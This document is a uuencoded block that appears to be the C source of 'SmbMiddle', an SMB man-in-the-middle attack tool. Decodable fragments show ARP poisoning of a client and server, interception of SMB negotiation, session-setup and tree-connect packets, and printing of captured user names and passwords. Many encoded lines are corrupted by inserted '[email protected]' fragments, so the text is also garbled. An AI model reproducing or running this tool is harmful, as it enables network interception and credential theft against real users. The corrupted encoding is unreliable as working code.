M,[email protected],S(I.PT*#0H)<&5R;75T92AO=70L(')L+"!P97)[email protected]*?0T*
M,%[email protected]/2!S=');,%T^/C$[#0H):V5Y6S%=(#[email protected]*"AS=');,%TF,'@P,2D\/#8I
M('[email protected]*'-T<ELQ73X^,BD[#0H):V5Y6S)=(#[email protected]*"AS=');,5TF,'@P,RD\/#4I
M('[email protected]*'-T<ELR73X^,RD[#0H):V5Y6S-=(#[email protected]*"AS=');,ETF,'@P-RD\/#0I
M('[email protected]*'-T<ELS73X^-"D[#0H):V5Y6S1=(#[email protected]*"AS=');,UTF,'@P1BD\/#,I
M('[email protected]*'-T<ELT73X^-2D[#0H):V5Y6S5=(#[email protected]*"AS=');-%TF,'@Q1BD\/#(I
M('[email protected]*'-T<ELU73X^-BD[#0H):V5Y6S9=(#[email protected]*"AS=');-5TF,'@S1BD\/#$I
M('[email protected]*'-T<ELV73X^-RD[#0H):V5Y6S==(#[email protected]<W1R6S9=)C!X-T8[#0H)9F]R
M("AI/3`[:3PX.VDK*[email protected]>PT*"0EK97E;:[email protected]/2`H:V5Y6VE=/#PQ*3L-"@E]
M#0I]#0H-"@T*<W1A=&EC('9O:[email protected]<VUB:&%S:"AU;G-I9VYE9"!C:&%R("IO
M#0H)=6YS:[email protected]<B!K97DR6SA=.PT*#0H)<W1R7W1O7VME>2AK97DL
M(&ME>3(I.PT*#0H)9F]R("AI/3`[:3PV-#MI*RLI('L-"@D):6YB6VE=(#[email protected]
M*&EN6VDO.%[email protected])B`H,3P\*#<M*&DE."DI*[email protected]/R`Q(#[email protected],#L-"@D):V5Y8EMI
M72`]("AK97DR6VDO.%[email protected])B`H,3P\*#<M*&DE."DI*[email protected]/R`Q(#[email protected],#L-"@D)
M;W5T8EMI72`](#`[#0H)?0T*#0H)9&]H87-H*&]U=&(L(&[email protected]:[email protected]
M#0H)?0T*#0H)9F]R("AI/3`[:3PV-#MI*RLI('L-"@D):[email protected]*&]U=&);:5TI
M:[email protected]]0,38H8V]N<[email protected]=6YS:[email protected]<B`J<#$T+'5N<VEG;F5D(&-H
M87(@*G`Q-BD-"GL-"G5N<VEG;F5D(&-H87(@<W`X6SA=(#[email protected]>S!X-&(L(#!X
M8FAA<[email protected]<#$V+"!S<#@L('`Q-"[email protected],2D[#0H)<VUB:&%S:"AP,38K."[email protected]<W`X
M+"!P,[email protected],2D[#0I]#0H-"G9O:[email protected]]0,C0H8V]N<[email protected]=6YS:[email protected]
M8VAA<B`J<#(Q+"`-"@D)8V]N<[email protected]=6YS:[email protected]<B`[email protected]('5N<VEG
M;F5D(&-H87(@*G`R-"D-"GL-"@ES;6)H87-H*'`R-"[email protected]@L('`R,[email protected],2D[
M#0H)<VUB:&%S:"AP,C0K."[email protected]@L('`R,2LW+"`Q*3L-"@ES;6)H87-H*'`R
M-"[email protected]@L('`R,2LQ-"[email protected],2D[#0I]#0H-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ
M*BHJ*BHJ*B\-"B\O36]D:[email protected];VYS('1O(')[email protected]('=R
M:71E(`T*#0IV;VED(%)E860H#[email protected]("`@("`@("`@:6YT(%-O8VLL#[email protected]("`@
M("`@("`@=5]C:&%R("I086-K970I#0I[#[email protected])T4V5S<VEO;DAD<B!.8G13
M97-S:6]N.PT*#[email protected];65M<V5T*%!A8VME="PP+$E07TU!6%]325I%*3L-"@D-
M*3L-"B`@#[email protected];65M8W!Y*%!A8VME="PH=5]C:&%R("HI("@F3F)T4V5S<VEO
M("`@("`H=5]C:&%R("HI("[email protected]*R!S:7IE;V8H3F)T4V5S<VEO;DAD
M<BDI+`T*("`@("`@(&YT;VAS*$YB=%-E<W-I;VXN3&5N9W1H*2D[#0I]#[email protected]
M#0H-"B`-"G9O:[email protected])I=&4H#[email protected]("`@("`@("`@(&EN="!3;V-K+`T*("`@
M8G1397-S:6]N.PT*(`T*($YB=%-E<W-I;[email protected]/2`H3F)T4V5S<VEO;DAD<B`J
M"B`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*R`-"B`@("`@("!N=&]H
M*BHJ*BHJ*BHJ+PT*#0HO*E1O(&[email protected]=&AE($U!0R!A9&1R97-S(&]F('1H
M0E5&7U-)6D5=.PT*#[email protected];"`](&QI8FYE=%]I;FET*$Q)0DY%5%],24Y++$1E
M=FEC92Q%<G)"=68I.PT*#[email protected]`](&QI8FYE=%]G971?:'=A9&1R*&PI.PT*
M#[email protected];65M8W!Y*$5N970L92T^971H97)?861D<E]O8W1E="Q%5$A?04Q%3BD[
M9&EF>2!T:&[email protected];F5G<')O="!R97!L>2HO#0H-"G9O:[email protected]')O=%)E<&QY
M#0HO*E-T87)T<R!H97)E("$J+R`-"B`-"B!.8G1397-S:6]N(#[email protected]*$YB=%-E
M<W-I;VY(9'(@*[email protected]*%!A8VME="D[#0H-"B!3;6)"87-E(#[email protected]*%-M8D)A<V5(
M9'(@*[email protected]*%!A8VME="`K('-I>F5O9BA.8G1397-S:6]N2&1R*2D[#0H-"B!3
M;6).96=0<F]T4F5P;'[email protected]/2`H4VUB3F5G4')O=%)E<&QY2&1R("HI(`T*("`@
M("`@("`@("`@("`@("`@("[email protected]*PT*("`@("`@("`@("`@("`@("`@
M("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@("`@("`@("`@("`@("`@
M(`T*("\J5&\@:&%V92!T:&[email protected]&]M86EN($YA;64J+PT*#[email protected]*E-E8W5R:71Y
M(#[email protected]*%-M8DYE9U!R;W1297!L>2T^4V5C=7)I='E-;V1E*2`F(#$[#0H-"B!I
M9BA396-U<FET>2D-"B![#[email protected]('!R:[email protected]&Y5<V5R(&QE=F5L(%-E8W5R
M:71Y7&XB*3L-"B!]#[email protected]*('L-"B`@<')I;G1F*")<;E-H87)E(&QE
M=F5L(%-E8W5R:71Y7&XB*3L-"B!]#0H-"B!$;VUA:6Y.86UE3&5N9W1H(#[email protected]
M0V]U;G1;,%TM#[email protected]("`@("`@("`@("`@("`@("`@($5.0U]+15E?3$5.1U1(
M.PT*#[email protected]&]M86EN3F%M92`]("AU7V-H87(@*[email protected]#[email protected]("`@("`@("`@("`@
M#0H-"B`O*D-O<'[email protected]=&AE($1O;6%I;B!N86UE(&EN(&[email protected]<W1R:6YG*B\-"@T*
M*2`K#[email protected]("`@("`@("!S:7IE;V8H4VUB0F%S94AD<[email protected]*PT*("`@("`@("`@
M<VEZ96]F*%-M8DYE9U!R;W1297!L>4AD<[email protected]*PT*("`@("`@("`@14Y#7TM%
M65],14Y'[email protected]+`T*("`@("`@("!$;VUA:6Y.86UE3&5N9W1H*3L-"B`@("`@
M("`@(`T*("\J5&\@:&%V92!T:&[email protected]<GEP=&EO;B!K97DJ+PT*#[email protected];65M
M8W!Y*$5N8W)Y<'1I;VY+97DL#[email protected]("`@("`@("AU7V-H87(@*[email protected]*%!A8VME
M="`K#[email protected]("`@("`@("`@("`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R
M*2`K#[email protected]("`@("`@("`@("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K
M#[email protected]("`@("`@("`@("`@("`@("`@('-I>F5O9BA3;6).96=0<F]T4F5P;'E(
M*E!A8VME="!M;V1I9FEC871I;VXJ+PT*#[email protected][email protected]=&AE(&1O;6%I;B!N
M"B!M96UC<'DH*'5?8VAA<B`J("[email protected]*%!A8VME="`K#[email protected]("`@("`@("`@("`@
M("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@("`@("`@("`@
M("`@("`@("`@("`@($1O;6%I;DYA;64L#[email protected]("`@("`@("`@("`@("`@("`@
M94-O=6YT6S!=(#[email protected]&]M86EN3F%M94QE;F=T:#L-"@T*+RI4;R!M;[email protected]
M=&AE('-E8W5R:71Y(&UO9&[email protected]!A;[email protected]=&AE(&5N8W)Y<'1I;[email protected]:V5Y
M(&QE;F=T:"HO#[email protected]#[email protected]')O=%)E<&QY+3Y396-U<FET>4UO9&[email protected]
M;V8H4VUB0F%S94AD<[email protected]*PT*("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("!$;VUA:6Y.86UE3&5N9W1H*3L-"@T*?0T*(`T*#[email protected]
M*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*+RI3;[email protected];6]D:69Y(&%N9"!S96YD
M('1H92!S971U<"!8(')E<75E<W0J+PT*#0H-"G9O:[email protected]=7!84F5Q=65S
M="@-"B`@("`@("`@("`@("`@("`@("`@=5]C:&%R("I086-K970L#[email protected]("`@
M9'(@*DYB=%-E<W-I;VX[#0H-"B!3;6)"87-E2&1R("I3;6)"87-E.PT*#[email protected]
M;W(@<&%C:V5T(&UO9&EF:6-A=&EO;BHO#[email protected]=5]C:&%R("I496UP.PT*('5?
M"B!I;[email protected]&5M<%-I>F4[#[email protected]=5]C:&%R(%!A<W-W;W)D6S$V73L-"@T*+RI3
M=&%R=',@:&5R92HO#0H-"B!.8G1397-S:6]N(#[email protected]*$YB=%-E<W-I;VY(9'(@
M*[email protected]*%!A8VME="D[("`-"@T*(%-M8D)A<[email protected]/2`H4VUB0F%S94AD<B`J*2`H
M8G1397-S:6]N2&1R*2D[#0H)"0T*(%-M8E-E='5P6%)E<75E<[email protected]/2`H4VUB
M2&1R*2D[#0H-"B!M96US970H4&%S<W=O<F0L,"PQ-BD[#[email protected]("`@("`@#[email protected]
M<W1R;F-P>2A087-S=V]R9"P-"B`@("`@("`@("AU7V-H87(@*[email protected]#[email protected]("`@
M<[email protected]*PT*("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K(`T*("`@("`@
M("`@('-I>F5O9BA3;6)3971U<%A297%U97-T2&1R*2DL#[email protected]("`@("`@("`@
M=&A;,%TI.PT*("`@("`@(`T*("\[email protected]=&AE<[email protected]:7,@82!S:&%R92!S96-U
M<FET>2!L979E;"[email protected][email protected]&]N)[email protected]<')I;[email protected]=&AE#[email protected]("[email protected]=7-E<B!N86UE
M*B\-"@[email protected]#[email protected]:68H4V5C=7)I='DI#[email protected]>PT*("!P<FEN=&8H(EQN57-E<B`Z
M("5S(BP-"B`@("`@("`@("AU7V-H87(@*[email protected]#[email protected]("`@("`@("`H4&%C:V5T
M("[email protected]#[email protected]("`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I("L-"B`@("`@
M("`@("!S:7IE;V8H4VUB0F%S94AD<[email protected]*R`-"B`@("`@("`@("!S:7IE;V8H
M4VUB4V5T=7!84F5Q=65S=$AD<[email protected]*PT*("`@("`@("`@(%-M8E-E='5P6%)E
M<75E<W0M/D-A<V5);G-E;G-I=&EV95!A<W-W;W)D3&5N9W1H6S!=*2D[#[email protected]
M?2`@("`@(`T*("`@("`@("`@#[email protected]<')I;G1F*")<;E!A<W,@.B`E<UQN7&XB
M+%!A<W-W;W)D*3L-"@T*("\O(%=E('!U="!T:&[email protected]<GEP=&5D('!A<W-W
M;W)D(&EN<[email protected];[email protected]=&AE('!A<W-W;W)D#[email protected]+R\@*B!I;B!C;&5A<B!T
M<GEP=&5D4&%S<W=O<F0I.PT*("`@("`@#[email protected]&5M<%-I>[email protected]/2`H4VUB4V5T
M72D[#[email protected]("`@("`-"B!496UP(#[email protected];6%L;&]C*%1E;7!3:7IE*G-I>F5O9BAU
M7V-H87(I*3L-"@T*(&UE;6-P>[email protected]=5]C:&%R("HI*"!496UP*[email protected]#[email protected]("`@
M("`@("AU7V-H87(@*[email protected]#[email protected]("`@("`@("[email protected]*R`-"B`@("`@("`@
M('-I>F5O9BA.8G1397-S:6]N2&1R*2`K#[email protected]("`@("`@("!S:7IE;V8H4VUB
M0F%S94AD<[email protected]*R`-"B`@("`@("`@('-I>F5O9BA3;6)3971U<%A297%U97-T
M2&1R*2`K#[email protected]("`@("`@("!3;6)3971U<%A297%U97-T+3Y#87-E26YS96YS
M:71I=F5087-S=V]R9$QE;F=T:%LP72DL#[email protected]("`@("`@("!496UP4VEZ92D[
M#0H-"B!M96UC<'DH*'5?8VAA<B`J*2`H4&%C:V5T("[email protected]#[email protected]("`@("`@("`@
M("`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R*2`K#[email protected]("`@("`@("`@
M("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K#[email protected]("`@("`@("`@("`@
M("`@("`@('-I>F5O9BA3;6)3971U<%A297%U97-T2&1R*2DL#[email protected]("`@("`@
M14Y'[email protected]*#[email protected];65M8W!Y*"AU7V-H87(@*[email protected]*%!A8VME="`K(`T*("`@
M("`@("`@("`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@
M("`@("`@("`@("`@("`@("!S:7IE;V8H4VUB0F%S94AD<[email protected]*PT*("`@("`@
M("`@("`@("`@("`@("!S:7IE;V8H4VUB4V5T=7!84F5Q=65S=$AD<[email protected]#[email protected]
M("`@("`@("`@("`@("`@("`@("[email protected]#7U!!4U-73U)$7TQ%3D=42"DL#[email protected]
M("`@("`@("AU7V-H87(@*[email protected]*%1E;7`I+`T*("`@("`@("`@5&5M<%-I>F4I
M.PT*("`@("`@#[email protected]=7!84F5Q=65S="T^0GET94-O=6YT6S!=(#[email protected]
M5&5M<%-I>[email protected]*R`-"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M97%U97-T+3Y#87-E4V5N<VET:79E4&%S<W=O<F1,96YG=&A;,%[email protected]/2`P>#`P
M.PT*#[email protected]=7!84F5Q=65S="T^0V%S94EN<V5N<VET:79E4&%S<W=O
M<F1,96YG=&A;,%T]14Y#7U!!4U-73U)$7TQ%3D=42#L-"@D)("`@("`@#[email protected]
M3F)T4V5S<VEO;BT^3&5N9W1H(#[email protected]:'1O;G,H<VEZ96]F*%-M8D)A<V5(9'(I
M=7!84F5Q=65S=$AD<[email protected]*R`-"B`@("`@("`@("`@("`@("`@("`@("`@("`@
M("!496UP4VEZ92`K#[email protected]("`@("`@("`@("`@("`@("`@("`@("`@("`@14Y#
M*BHJ*BHJ*B\-"@T*+R].;W)[email protected]]N;F5X:6]N(&]N('!O<[email protected],3,Y#0H-
M"FEN="!.;W)M86PH:6YT(%-O8VM0<F]X>[email protected]:6YT(%-O8VM3;6)397)V97(I
M#0I[#[email protected]:6YT(%-E8W5R:71Y/3`[#0H-"B!I;[email protected]]U;G0[#0H-"B!U7V-H
M87(@16YC<GEP=&EO;DME>5M%3D-?2T597TQ%3D=42%T[#[email protected]#[email protected]=5]C:&%R
M*BHJ*BHJ*B\-"@T*(%)E860H4V]C:U!R;WAY+%!A8VME="D[#[email protected](`T*(%=R
M(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#[email protected]"A3;V-K4VUB4V5R
M"B\J*BHJ*BHJ*BHJ*DY%[email protected]"HJ*BHJ*BHJ*BHJ*B\-"@T*
M(%)E860H4V]C:U!R;WAY+%!A8VME="D[#[email protected](`T*#[email protected])I=&4H4V]C:U-M
M*3L-"@T*($YE9U!R;W1297!L>[email protected]"B`@("`@("`@("`@("`@4&%C:V5T+`T*
M4V5C=7)I='DI.PT*#[email protected])I=&4H4V]C:U!R;WAY+%!A8VME="D[#0H-"B\J
M=&EO;DME>2P-"B`@("`@("`@("`@("`@(%-E8W5R:71Y*3L-"B`@#[email protected])I
M55!8(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#[email protected]"A3;V-K4VUB4V5R
M=F5R+%!A8VME="D[#0H-"B!M96UC<'DH#[email protected]("`@("`@("AU7V-H87(@*[email protected]
M*"!N=&]H<RA.8G1397-S:6]N+DQE;F=T:"[email protected]/B`S-2`I#[email protected]>PT*("!P<FEN
M#0H-"B`@5W)I=&4H4V]C:U!R;WAY+%!A8VME="D[#[email protected](`T*+RHJ*BHJ*BHJ
M*BHJ5$-/[email protected]@24Y415)#15!424].*BHJ*BHJ*BHJ+PT*("`@#[email protected](%)E860H
M86-K970I.PT*#[email protected]('!R:[email protected]<[email protected]`E<UQN(BP-"B`@("`@("`@
M("AU7V-H87(@*[email protected]*%!A8VME="`K#[email protected]("`@("`@("`@("`@("`@("`@("!S
M:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@("`@("`@("`@("`@("`@("`@
M>F5O9BA3;6)48V]N6%)E<75E<W1(9'(I("[email protected],2`I*3L-"@T*+RHJ*BHJ*BHJ
M*BHJ4D5$25)%0U1)3TXJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#[email protected]("\O1&\@>6]U
M('=A;[email protected]=&\@:&%V92!N;[email protected];F<@<F5A9"@I(&-A;&QS(#\-"@T*
M=&PH4V]C:U-M8E-E<G9E<BQ&7U-%5$9,+$]?3D].0DQ/0TLI.PT*#[email protected]('=H
M:6QE*#$I#[email protected]('L-"B`@($-O=6YT(#[email protected]<F5A9"A3;V-K4')O>'DL)DYB=%-E
M*0T*("`@>PT*("`@('!R:[email protected]&Y397-S:6]N(&9I;FES:&5D("%<;B(I
M.PT*("`@(&-L;W-E*%-O8VM0<F]X>2D[#[email protected]("`@8VQO<V4H4V]C:U-M8E-E
M<G9E<BD[#[email protected]("`@<F5T=7)N(#`[#[email protected]("!]#[email protected]("`-"B`@(&EF*$-O=6YT
M<B`J*2`H)DYB=%-E<W-I;VXI+'-I>F5O9BA.8G1397-S:6]N2&1R*2D[#[email protected]
M("`@("`@*'5?8VAA<B`J*2`H4&%C:V5T("[email protected]<VEZ96]F*$YB=%-E<W-I;VY(
M*[email protected]*%!A8VME="DL#[email protected]("`@("`@("`@;G1O:',H3F)T4V5S<VEO;BY,96YG
M?0T*#[email protected]("!#;W5N="`](')E860H4V]C:U-M8E-E<G9E<BPF3F)T4V5S<VEO
M;BQS:7IE;V8H3F)T4V5S<VEO;DAD<BDI.PT*#[email protected]("[email protected]]U;G0I#[email protected]
M("![#[email protected]("`@<')I;G1F*")<;E-E<W-I;[email protected]:[email protected](5QN(BD[#[email protected]
M*3L-"B`@("!R971U<[email protected],#L-"B`@('T-"B`@(`T*("`@:68H0V]U;[email protected]([email protected]
[email protected])[email protected]]U;G0I#[email protected]("![#[email protected]("`@;65M<V5T*%!A8VME="PP+$E07TU!
M6%]325I%*[email protected]#[email protected]("`-"B`@("!M96UC<'DH4&%C:V5T+"AU7V-H87(@*[email protected]
M("`@("`@("`@("`@("`-"B`@("!R96%D*%-O8VM3;6)397)V97(L#[email protected]("`@
M("`@("`H=5]C:&%R("HI("[email protected]*R!S:7IE;V8H3F)T4V5S<VEO;DAD
M#[email protected]("`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I*3L-"B`@('T-"B`@
M?0T*('T-"B!E;'-E#[email protected]>PT*("!P<FEN=&8H(E-E<W-I;[email protected]%I;&5D("T^
M(%!A<W-W;W)D(&EN=F%L:[email protected](5QN(BD[#[email protected]("`-"B`@5W)I=&4H4V]C:U!R
M;WAY+%!A8VME="D[#[email protected]#[email protected](&-L;W-E*%-O8VM0<F]X>2D[#[email protected](&-L;W-E
M*%-O8VM3;6)397)V97(I.PT*("`-"B`@<F5T=7)N(#`[#[email protected]?0T*(`T*(&-L
M;W-E*%-O8VM0<F]X>2D[#[email protected]<V4H4V]C:U-M8E-E<G9E<BD[#[email protected]#[email protected]
M<R!T:&[email protected](DYO<FUA;"(@9G5N8W1I;VX-"B`J(&)U="!T:&[email protected];F)T(&YA;65S
M('-E;F1I;F<@<')O8V5S<R!I<R!N;[email protected]:6YC;'[email protected]*B\-"@T*:6YT(%=I
M*0T*>PT*(&EN="!396-U<FET>3TP.PT*#[email protected]:6YT($-O=6YT.PT*#[email protected]=5]C
M<B!086-K971;25!?34%87U-)6D5=.PT*#[email protected])T4V5S<VEO;DAD<B!.8G13
M97-S:6]N.PT*#[email protected]#0H-"B\J*BHJ*BHJ*BHJ*DY%[email protected]"HJ
M*BHJ*BHJ*BHJ*B\-"@T*(%)E860H4V]C:U!R;WAY+%!A8VME="D[#[email protected](`T*
M#[email protected])I=&4H4V]C:U-M8E-E<G9E<BQ086-K970I.PT*#0HO*BHJ*BHJ*BHJ
M;6)397)V97(L4&%C:V5T*3L-"@T*($YE9U!R;W1297!L>[email protected]"B`@("`@("`@
M("`@("`@("`@("`@("`F4V5C=7)I='DI.PT*#[email protected])I=&4H4V]C:U!R;WAY
M:71Y*3L-"B`@#[email protected])I=&4H4V]C:U-M8E-E<G9E<BQ086-K970I.PT*(`T*
M+RHJ*BHJ*BHJ*BHJ4T5455!8(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#[email protected]
M4F5A9"A3;V-K4VUB4V5R=F5R+%!A8VME="D[#0H-"B!M96UC<'DH#[email protected]("`@
M("`@("AU7V-H87(@*[email protected]*"9.8G1397-S:6]N*2P-"B`@("`@("`@*'5?8VAA
M*3L-"B`-"B`@(`T*(&EF*"!N=&]H<RA.8G1397-S:6]N+DQE;F=T:"[email protected]/B`S
M-2`I#[email protected]>PT*("!P<FEN=&8H(D%C8V5S<R!G<F%N=&5D("T^(%!A<W-W;W)D
M#[email protected](`T*+RHJ*BHJ*BHJ*BHJ5$-/[email protected]@24Y415)#15!424].*BHJ*BHJ*BHJ
M+PT*("`@#[email protected](%)E860H4V]C:U!R;WAY+%!A8VME="D[#0H-"B`@5W)I=&4H
M4V]C:U-M8E-E<G9E<BQ086-K970I.PT*#[email protected]('!R:[email protected]<[email protected]`E
M<UQN(BP-"B`@("`@("`@("AU7V-H87(@*[email protected]*%!A8VME="`K#[email protected]("`@("`@
M("`@("`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@("`@
M("`@("`@("`@("`@('-I>F5O9BA3;6)48V]N6%)E<75E<W1(9'(I("[email protected],2`I
M+PT*#[email protected]("\O1&\@>6]U('=A;[email protected]=&\@:&%V92!N;[email protected];F<@<F5A
M0DQ/0TLI.PT*#[email protected]('=H:6QE*#$I#[email protected]('L-"B`@($-O=6YT(#[email protected]<F5A9"A3
M"B`@(`T*("`@:68H(4-O=6YT*0T*("`@>PT*("`@('!R:[email protected]&Y397-S
M:6]N(&9I;FES:&5D("%<;B(I.PT*("`@(&-L;W-E*%-O8VM0<F]X>2D[#[email protected]
M("`@8VQO<V4H4V]C:U-M8E-E<G9E<BD[#[email protected]("`@<F5T=7)N(#`[#[email protected]("!]
M97-S:6]N2&1R*2D[#[email protected]("`@("`@("`@("`@("`@("`@(`T*("`@(')E860H
M4V]C:U!R;WAY+`T*("`@("`@("`@*'5?8VAA<B`J*2`H4&%C:V5T("[email protected]<VEZ
M("`@("`@("AU7V-H87(@*[email protected]*%!A8VME="DL#[email protected]("`@("`@("`@;G1O:',H
M<VEO;DAD<BDI.PT*("`@?0T*#[email protected]("!#;W5N="`](')E860H4V]C:U-M8E-E
M#[email protected]("[email protected]]U;G0I#[email protected]("![#[email protected]("`@<')I;G1F*")<;E-E<W-I;[email protected]
M9FEN:[email protected](5QN(BD[#[email protected]("`@8VQO<V4H4V]C:U!R;WAY*3L-"B`@("!C
M;&]S92A3;V-K4VUB4V5R=F5R*3L-"B`@("!R971U<[email protected],#L-"B`@('T-"B`@
M(`T*("`@:68H0V]U;[email protected]([email protected][email protected])[email protected]]U;G0I#[email protected]("![#[email protected]("`@;65M
M<V5T*%!A8VME="PP+$E07TU!6%]325I%*[email protected]#[email protected]("`-"B`@("!M96UC<'DH
M4&%C:V5T+"AU7V-H87(@*[email protected]*"9.8G1397-S:6]N*2QS:7IE;V8H3F)T4V5S
M8VM3;6)397)V97(L#[email protected]("`@("`@("`H=5]C:&%R("HI("[email protected]*R!S
M=%-E<W-I;VXN3&5N9W1H*2`K#[email protected]("`@("`@("`@<VEZ96]F*$YB=%-E<W-I
M;VY(9'(I*3L-"B`@('T-"B`@?0T*('T-"B!E;'-E#[email protected]>PT*("!P<FEN=&8H
M(E-E<W-I;[email protected]%I;&5D("T^(%!A<W-W;W)D(&EN=F%L:[email protected](5QN(BD[#[email protected]
M("`-"B`@5W)I=&4H4V]C:U!R;WAY+%!A8VME="D[#[email protected]#[email protected](&-L;W-E*%-O
M8VM0<F]X>2D[#[email protected](&-L;W-E*%-O8VM3;6)397)V97(I.PT*("`-"B`@<F5T
M=7)N(#`[#[email protected]?0T*(`T*(&-L;W-E*%-O8VM0<F]X>2D[#[email protected]<V4H4V]C
M:U-M8E-E<G9E<BD[#[email protected]#[email protected]<F5T=7)N(#`[#0I](`T*("`-"@T*#0H-"B\J
M*BHJ*BHJ*@T*("`@("`@("`@("`@("`@("`@("`@("`@("`@5$A%([email protected]
M(&-H87(@*F]P=&%R9SL-"F5X=&5R;B!I;[email protected];W!T:6YD.PT*97AT97)N(&EN
M"GL-"B!S=&%T:6,@8VAA<B!O<'1S=')I;F=;73TB:3IS.F,Z9CIL.B([#[email protected]
M:6YT(&]P=&-H.PT*(&EN="!,:7-T96Y0;W)T(#[email protected],3$S.3L-"B!C:&%R("I$
M979I8V4[#0H-"B!S=')[email protected]<V]C:V%D9')?:[email protected]=F5R.PT*('-T
M<G5C="!S;V-K861D<E]I;B!0<F]X>3L-"B`-"B!I;[email protected]]C:U-M8E-E<G9E
M<CL-"B!I;[email protected]]C:U!R;WAY.PT*#[email protected]:6YT($-O=6YT.PT*#[email protected]<B!#
M:&]I8V4],#L-"@T*+RI3979E<F%L($E0(&%D9')E<W-E<RHO#[email protected]=5]I;G0S
M,E]T($UY27`[#[email protected]#[email protected]<&-A<%]T("I$97-C<CL-"B`-"B!U7V-H87(@4F5A
M<G9E<EM%5$A?04Q%3ET[#[email protected]=5]C:&%R($UY16YE=%M%5$A?04Q%3ET[#[email protected]
M#[email protected]<B!%<G)B=69;-#`Y-ET[#0H-"B!I9BAA<F=C(#[email protected],3$I#[email protected]>PT*
M("`@("`@("UF($9A:[email protected]!<;B(I.PT*("`-"B`@<F5T=7)N(#`[#[email protected]?0T*
M(`T*('=H:6QE*"AO<'1C:#[email protected];W!T*&%R9V,L87)G=BQO<'1S=')I;F<I
M*2$]14]&*0T*('L-"B`@<W=I=&-H*&]P=&-H*0T*("![#[email protected]("!C87-E("=I
M)SH-"B`@("[email protected]/2`H8VAA<B`J*2`H;6%L;&]C*'-T<FQE;BAO<'1A
M9RQS=')L96XH;W!T87)G*2D[#[email protected]("`@8G)E86L[#0H-"B`@(&-A<[email protected])V,G
[email protected]*("`@(&EN971?871O;BAO<'1A<F<L)E!R;WAY+G-I;E]A9&1R*3L-"B`@
M("!B<F5A:SL-"@T*("`@8V%S92`G<R<Z#[email protected]("`@:6YE=%]A=&]N*&]P=&%R
M92`G9B<Z#[email protected]("`@37E)<"`](&EN971?861D<BAO<'1A<F<I.PT*("`@(&)R
M96%K.PT*("`@#[email protected]("!C87-E("=L)SH-"B`@("!,:7-T96Y0;W)T(#[email protected]
M:2AO<'1A<F<I.PT*("`@(&)R96%K.PT*("`@#[email protected]("!D969A=6QT(#H-"B`@
M("!P<FEN=&8H(EQN4VUB36ED9&QE(`T*("`@("`@("`@("`@[email protected]:6YT97)F
M86-E(`T*("`@("`@("`@("`@+6,@0VQI96YT)W,@25`@#[email protected]("`@("`@("`@
M;W)T#[email protected]("`@("`@("`@("`M9B!&86ME($EP7&XB*3L-"B`@("!R971U<[email protected]
M,#L-"B`@('T-"B`@?0T*#[email protected]&5S8W(@/2!P8V%P7V]P96Y?;&EV92A$979I
M('EO=2!W86YT(%=I;C)K+UA0('-U<'!O<[email protected]*$Y"5"!D:7-A8FQE9"`A*2`Z
M('DO;C]<;B(I.PT*("!#:&][email protected]/2!G971C:&%R*"D[#[email protected](&=E=&-H87(H
M(&[email protected]=&AE($U!0R!A9')E<W,@;[email protected]=&AE(&-L:65N="HO#[email protected]#[email protected])P
M4F5Q=65S=$EN:F5C=&EO;[email protected])<"P-"B`@("`@("`@("`@("`@("`@("`@
M("90<F]X>2YS:6Y?861D<BYS7V%D9'(L#[email protected]("`@("`@("`@("`@("`@("`@
M("!->45N970L#[email protected]("`@("`@("`@("`@("`@("`@("!296%L16YE=$-L:65N
M27`L#[email protected]("`@("`@("`@("`@("93;6)397)V97(N<VEN7V%D9'(N<U]A9&1R
M+`T*("`@("`@("`@("`@("!->45N970L#[email protected]("`@("`@("`@("`@(%)E86Q%
M;F5T4VUB4V5R=F5R+`T*("`@("`@("`@("`@("!$979I8V4L#[email protected]("`@("`@
M("`@("`@($1E<V-R*3L-"@T*+RI!<G`@<&]I<V]N:6YG(&%G86EN<[email protected]=&AE
M('-E<G9E<BHO#[email protected]#[email protected])P4&]I<V]N*`T*("`@("`@("`@("`F4')O>'DN
M<G`@<&]I<V]N:6YG(&%G86EN<[email protected]=&AE(&-L:65N="HO#0H-"B!!<G!0;VES
M;VXH#[email protected]("`@("`@("`@("93;6)397)V97(N<VEN7V%D9'(N<U]A9&1R+`T*
M("!->45N970L#[email protected]("`@("`@("`@(%)E86Q%;F5T0VQI96YT+`T*("`@("`@
M('-W:71C:"A#:&]I8V4I#[email protected]>PT*("!C87-E("=Y)R`Z#[email protected](%-M8E-E<G9E
M#[email protected](`T*("!C87-E("=N)R`Z#[email protected](%-M8E-E<G9E<BYS:6Y?<&]R="`](&AT
M;VYS*%--0E]03U)4*3L-"B`@8G)E86L[#0H-"B`@9&5F875L="`Z#[email protected]('!R
M:[email protected]&Y0;&5A<[email protected]=V5R(&)Y('[email protected];W(@;B!F;W(@=&AE('=I;C)K
M+UA0('-U<'!O<G1<;B(I.PT*("!R971U<[email protected],#[email protected]#[email protected]?0T*(`T*(%-M8E-E
M<G9E<BYS:6Y?9F%M:6QY(#[email protected]?24Y%5#L-"B!3;V-K4VUB4V5R=F5R(#[email protected]
M9F%M:6QY(#[email protected]?24Y%5#L-"B!0<F]X>2YS:6Y?<&]R="`](&AT;VYS*$QI
